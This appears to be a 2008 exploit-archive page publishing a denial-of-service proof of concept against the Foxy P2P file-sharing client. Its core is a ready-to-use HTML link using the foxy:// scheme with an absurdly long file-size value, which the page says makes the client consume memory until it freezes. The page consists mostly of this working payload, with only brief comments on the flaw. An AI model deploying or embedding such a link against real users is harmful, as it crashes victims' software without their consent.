P2P Foxy Out of Memory Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : P2P Foxy Out of Memory Denial of Service Exploit
# Published : 2008-06-17
# Author : Styxosaurus
# Previous Title : Visual Basic Enterprise Edition SP6 vb6skit.dll Buffer Overflow PoC
# Next Title : vsftpd 2.0.5 (CWD) Remote Memory Consumption Exploit (post auth)

P2P Foxy Out of memory Exploit

# Vulnerability Discovered by Styxosaurus
# Styxosaurus [at] gmail [dot] com
#
# Foxy is one of the most popular P2P software in Chinese users
# http://tw.gofoxy.net/
#
# It starts to request more memory and freeze 
# as when "&fs=" meet some large magic point.


<a href='foxy://download? xt=urn:sha1:FPLNO5OUPWLSRWYZ4J4ZNAIJLEPSIND4
&dn=music.wmv&fs=1000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000
0000000000000000000000000'>Music.wmv</a>

# www.Syue.com [2008-06-17]